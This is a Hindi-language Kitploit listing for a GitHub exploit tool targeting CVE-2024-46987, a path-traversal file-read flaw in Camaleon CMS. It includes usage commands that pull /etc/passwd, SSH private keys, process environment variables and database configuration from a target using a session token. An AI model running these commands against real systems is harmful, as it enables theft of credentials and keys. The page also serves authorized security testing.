Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-46987 — CVE-2024-46987 - Camaleon CMS LFI शोषण | Kitploit
उपकरण/GitHubGitHub/rival420/cve-2024-46987
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubrival420/cve-2024-46987

CVE-2024-46987

CVE-2024-46987 - Camaleon CMS LFI शोषण

रिपॉजिटरी देखें
7 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-46987 - कैमेलियन CMS स्थानीय फ़ाइल सम्मिलन

कैमेलियन CMS के लिए प्रमाणित स्थानीय फ़ाइल सम्मिलन (LFI) शोषण।

भेद्यता

कैमेलियन CMS /admin/media/download_private_file एंडपॉइंट के माध्यम से एक प्रमाणित LFI हमले के लिए संवेदनशील है। file पैरामीटर ठीक से स्वच्छ नहीं किया गया है, जो सर्वर से मनमानी फ़ाइलों को पढ़ने के लिए पथ ट्रैवर्सल की अनुमति देता है।

प्रभावित संस्करण

  • कैमेलियन CMS < 2.8.2

आवश्यकताएँ

root@kitploit:~
pip install requests

उपयोग

root@kitploit:~
# Print file to terminal (default)
python3 exploit.py -u http://example.com -f /etc/passwd -t "auth_token"

# Save to file
python3 exploit.py -u http://example.com -f /etc/passwd -t "auth_token" -o passwd.txt

पैरामीटर

पैरामीटरविवरण
-u, --urlलक्ष्य URL
-f, --fileपढ़ने के लिए फ़ाइल (जैसे, /etc/passwd)
-t, --tokenauth_token कुकी मान
-o, --outputआउटपुट फ़ाइल नाम (वैकल्पिक, सेट न होने पर टर्मिनल पर प्रिंट होता है)

उदाहरण

root@kitploit:~
# Read passwd file
python3 exploit.py -u https://example.com -f /etc/passwd -t "auth_token"

# Read SSH keys
python3 exploit.py -u https://example.com -f /home/user/.ssh/id_rsa -t "auth_token" -o id_rsa

# Read environment variables
python3 exploit.py -u https://example.com -f /proc/self/environ -t "auth_token"

# Read application config
python3 exploit.py -u https://example.com -f /var/www/html/config/database.yml -t "auth_token"

अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। इसका उपयोग केवल उन सिस्टमों के विरुद्ध करें जिनके परीक्षण की आपको स्पष्ट अनुमति है।

संदर्भ

  • CVE-2024-46987
  • Camaleon CMS
टूल डाउनलोड करें